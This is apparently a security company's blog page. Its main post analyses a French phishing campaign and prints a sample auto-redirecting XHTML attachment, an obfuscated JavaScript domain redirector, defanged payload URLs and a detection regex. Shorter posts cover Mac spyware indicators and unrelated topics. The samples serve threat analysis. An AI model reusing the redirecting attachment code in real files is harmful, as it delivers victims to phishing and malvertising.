We have recently observed an ongoing phishing campaign targeting French industry. Among the targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Beginning in October 2018, we have seen multiple phishing emails that follow a similar pattern and use similar indicators, with the obfuscation evolving quickly over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

The subject of the email follows the prefix of the attachment name. The attachments can be HTML or PDF files, usually named “document”, “preuves”, or “fact”, optionally followed by an underscore and six digits. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf
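This naming pattern lends itself to a simple mail-gateway detection rule. Below is a sketch of one; the regex is our own generalization of the observed names, not a confirmed campaign signature:

```python
import re

# Optional "document"/"preuves"/"fact" prefix, six digits,
# and an HTML-ish or PDF extension, as seen in the campaign.
ATTACHMENT_RE = re.compile(
    r"^(?:(?:document|preuves|fact)_)?\d{6}\.(?:xht|xhtml|html?|pdf)$",
    re.IGNORECASE,
)

def looks_like_campaign_attachment(name: str) -> bool:
    """True if a filename matches the naming pattern observed in this campaign."""
    return ATTACHMENT_RE.match(name) is not None
```

A rule like this will obviously produce false positives on benign six-digit filenames, so it is best used for hunting rather than blocking.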

Here’s example content of an XHTML attachment from the 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<meta content="UTF-8" />
<body onload='document.getElementById("_y").click();'>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>


Evolution of the campaign

The first observed phishing emails in the beginning of October contained an unobfuscated payload address. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October, these payload addresses were further obfuscated by putting them behind redirects. The author developed a simple piece of JavaScript to obfuscate a bunch of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This Javascript code, which was part of the attachment, deobfuscated an array of [random].pw domains that redirected the users to the payload domain. In this particular campaign, the payload domain has changed to hxxp://email-document-joint[.]pro/redir/.
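The obfuscation amounts to plain \xNN hex escaping of each domain string, from which the script picks one at random. Decoding the first array entry shown above is a one-liner; here in Python for illustration:

```python
# First entry of the _0xa4d9 array from the attachment's JavaScript
obfuscated = ("\\x75\\x71\\x76\\x6B\\x38\\x66\\x74\\x75\\x77\\x35\\x69"
              "\\x74\\x38\\x64\\x73\\x67\\x6C\\x63\\x7A\\x2E\\x70\\x77")

# A JavaScript engine interprets the \xNN escapes at parse time;
# unicode_escape does the equivalent here
domain = obfuscated.encode("ascii").decode("unicode_escape")
print(domain)  # prints "uqvk8ftuw5it8dsglcz.pw"
```

The same one-liner recovers the rest of the throwaway .pw redirect domains in the array.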

However, it appears that the use of JavaScript code inside attachments was not a huge success: only days later, the domain-deobfuscation and redirection code was moved behind pste.eu, a Pastebin-like service for HTML code. The phishing emails thereafter contained pste.eu links such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration of evolution during November, we observed a few different styles. Some emails contained links to subdomains of random .pw or .site domains, such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site

At this point, PDF files were also seen as attachments in the phishing emails. These PDFs contained similar links to random subdomains of .site or .website domains.

A few days later, on the 15th of November, the attackers added another layer of redirection in front of the pste.eu URLs by using Twitter-shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents in their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns or products/lotteries etc.


The pste.eu links in Twitter


Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to 302 redirection chain. The delivery method remained as XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly and the attackers are active in generating new domains and new ways of redirection and obfuscation. At the time of writing, it seems the payload URLs lead to an advertising redirection chain with multiple different domains and URLs known for malvertising.



The campaign has mostly been observed using compromised Wanadoo email accounts, and later, email accounts in the attackers’ own domains, such as rault@3130392E3130322E37322E3734.lho33cefy1g.pw, to send out the emails. The subdomain is the name of the sending email server and is a hex representation of the server’s public IP address.
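The hex subdomain decodes directly to an ASCII dotted quad. A quick check in Python on the sender address shown above:

```python
# Hex subdomain from the observed sender address:
#   rault@3130392E3130322E37322E3734.lho33cefy1g.pw
hex_subdomain = "3130392E3130322E37322E3734"

# Each hex pair is one ASCII character of the sending server's IP address
ip = bytes.fromhex(hex_subdomain).decode("ascii")
print(ip)  # prints "109.102.72.74"
```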

The server behind the .pw domain appears to be a Postfix email server that is already listed on multiple blacklists. The compromised email accounts used for sending out the phishing emails always come from .fr domains.

The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.

Following the redirections after the payload domains (e.g. email-document-joint[.]pro or .pw payload domains) later in November, we get redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers with a lot of similar looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/Adware programs and more malvertising URLs.

Continuing on to the ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.


Additional Find

During the investigation we came across an interesting artifact on VirusTotal, submitted from France. The file is a .zip archive that contains the following:

  • “All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
  • Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified results
    • Ostatok.txt – Ostatok means “the rest” or “remainder”

Contents of the .zip file. 03.10_17:55 is the directory created by the tool, containing the checker results. Both .vbs files are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.


Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails on the 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to zip up this tool, along with the results, and submit it to VirusTotal?

When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with a Wscript.Echo() alert


Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.



This is a non-exhaustive list of indicators observed during the campaign.

jeu0rgf5apd5337.site - Email Server

The following indicators have been observed but are benign and can cause false positives.


Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!


As strange as it sounds, I sometimes find powerpoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.



Some members of the SHERPA project recently attended WebSummit in Lisbon – a four day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI on the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate click here.


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉

Spam campaign targets Exodus Mac Users

We’ve seen a small spam campaign that attempts to target Mac users that use Exodus, a multi-cryptocurrency wallet.

The theme of the email focuses mainly on Exodus. The attachment was “Exodus-MacOS-1.64.1-update.zip” and the sender domain was “update-exodus[.]io”, suggesting that it wanted to associate itself with the organization. It was trying to deliver a fake Exodus update using the subject “Update 1.64.1 Release – New Assets and more”. The latest released version of Exodus, however, is 1.63.1.

Fake Exodus Update email

Extracting the attached archive leads to the application which was apparently created yesterday.

Spytool’s creation date

The application contains a Mach-O binary with the filename “rtcfg”. The legitimate Exodus application, however, uses “Exodus”.

We checked the strings and found a bunch of references to the “realtime-spy-mac[.]com” website.

On the website, the developer describes their software as a cloud-based surveillance and remote spy tool. Their standard offering costs $79.95 and comes with a cloud-based account where users can view the images and data that the tool uploads from the target machine. The strings extracted from the Mac binary in the spam mail coincide with the features mentioned on the realtime-spy-mac[.]com site.

Strings inside the Realtime-Spy tool

Searching for similar instances of the Mac keylogger in our repository yielded other samples using these filenames:

  • taxviewer.app
  • picupdater.app
  • macbook.app
  • launchpad.app

Based on the spy tool’s website, it appears to support not only Mac, but Windows as well. It’s not the first time we’ve seen Windows threats target Mac. As the crimeware threat actors on Windows take advantage of the cryptocurrency trend, they too seem to want to expand their reach, and have thus ended up targeting Mac users as well.

Indicators of Compromise


  • b6f5a15d189f4f30d502f6e2a08ab61ad1377f6a – rtcfg
  • 3095c0450871f4e1d14f6b1ccaa9ce7c2eaf79d5 – Exodus-MacOS-1.64.1-update.zip
  • 04b9bae4cc2dbaedc9c73c8c93c5fafdc98983aa – picupdater.app.zip
  • c22e5bdcb5bf018c544325beaa7d312190be1030 – taxviewer.app.zip
  • d3150c6564cb134f362b48cee607a5d32a73da66 – launchpad.app.zip
  • bf54f81d7406a7cfe080b42b06b0a6892fcd2f37 – macbook.app.zip


  • Monitor:OSX/Realtimespy.b6f5a15d18!Online


  • realtime-spy-mac[.]com
  • update-exodus[.]io


Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing number of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy-focused organizations. The Chatham House Rule (in particular, a no-recording policy) was applied to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in the text of this post. But for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.


Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.”

Pwnies2018 The Pwnie Awards

Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure earlier this year. Both MWR and F-Secure have a long history of geek culture. One thing we’ve done for years, is to take our trophies (or “Poikas”) for a trip around the town. For an example, see this.

So, while the Pwnie is still here in Helsinki before going home to the UK, we took it around the town!

Pwnie2018 HQ

Pwnie at the F-Secure HQ.

Pwnie2018 Kanava

Pwnie at Ruoholahdenkanava.

Pwnie2018 Harbour

Pwnie at the West Harbour.

Pwnie2018 Baana

Pwnie looks at the Baana.

Pwnie2018 Museum

Pwnie and some Atari 2600s and laptops at the Helsinki computer museum.

Pwnie2018 MIG

Pwnie looking at a Mikoyan-Gurevich MiG-21 supersonic interceptor.

Pwnie2018 Tennispalatsi

Pwnie at the Art Museum.

Pwnie2018 awards

Pwnie chilling on our award shelf.

Pwnie2018 Parliament

Pwnie at the house of parliament.


Pwnie at Tuomiokirkko, the Helsinki Cathedral.

Thanks for all the bugs, MWR!


P.S. If you’re wondering about the word “Poika” we use for trophies, here’s a short documentary video that explains it in great detail.


How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28, A.K.A. “Fancy Bear”, according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details. And many of the subsequent (non-technical) articles that have been published have focused almost exclusively on […]


Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.


Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally. To start with, let’s recap. In my […]


Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an […]


How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same […]


Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project. “The Scalable and Secure […]


Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, […]
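The search call itself needs live Twitter API keys, so here is a minimal sketch of the 7-day window the excerpt mentions instead. The tweet records and the `within_days` helper are hypothetical stand-ins for the dicts twarc’s `search()` yields; `created_at` uses the API’s standard timestamp format.

```python
from datetime import datetime, timedelta

# Hypothetical records standing in for the tweet dicts returned by
# twarc's search(); only the fields used below are included.
tweets = [
    {"id_str": "1", "created_at": "Mon Aug 06 10:00:00 +0000 2018"},
    {"id_str": "2", "created_at": "Mon Jul 09 10:00:00 +0000 2018"},
]

def within_days(tweet, days, now):
    """Check whether a tweet's created_at falls inside the last `days` days."""
    created = datetime.strptime(tweet["created_at"], "%a %b %d %H:%M:%S %z %Y")
    return now - created <= timedelta(days=days)

# Pretend "now" is Aug 10 2018, so only the first tweet is inside the window.
now = datetime.strptime("Fri Aug 10 00:00:00 +0000 2018",
                        "%a %b %d %H:%M:%S %z %Y")
recent = [t["id_str"] for t in tweets if within_days(t, 7, now)]
print(recent)  # ['1']
```

Since the standard search endpoint only covers roughly the last seven days, a check like this is mostly useful as a sanity filter on whatever the API hands back.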


NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely: “Word2vec takes as its input a large corpus of text and produces a vector space, typically of several […]


NLP Analysis And Visualizations Of #presidentinvaalit2018

During the lead-up to the January 2018 Finnish presidential elections, I collected a dataset consisting of raw Tweets gathered from search words related to the election. I then performed a series of natural language processing experiments on this raw data. The methodology, including all the code used, can be found in an accompanying blog post. […]


How To Get Tweets From A Twitter Account Using Python And Tweepy

In this blog post, I’ll explain how to obtain data from a specified Twitter account using tweepy and Python. Let’s jump straight into the code! As usual, we’ll start off by importing dependencies. I’ll use the datetime and Counter modules later on to do some simple analysis tasks. from tweepy import OAuthHandler from tweepy import […]
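Fetching a timeline requires real tweepy credentials, so this sketch only shows the Counter-based analysis step the excerpt alludes to, run over hypothetical stand-in records rather than live tweepy Status objects.

```python
from collections import Counter
from datetime import datetime

# Hypothetical tweet records standing in for tweepy Status objects;
# a real run would fetch these from the Twitter API instead.
tweets = [
    {"created_at": datetime(2018, 1, 5, 9), "text": "morning tweet"},
    {"created_at": datetime(2018, 1, 5, 21), "text": "evening tweet"},
    {"created_at": datetime(2018, 1, 6, 9), "text": "another morning"},
]

# Simple analysis: count tweets per hour of day to see posting habits.
hours = Counter(t["created_at"].hour for t in tweets)
print(hours.most_common())  # [(9, 2), (21, 1)]
```

The same Counter pattern works on any field of the fetched tweets (source client, hashtags, weekday), which is why it shows up in this kind of quick account analysis.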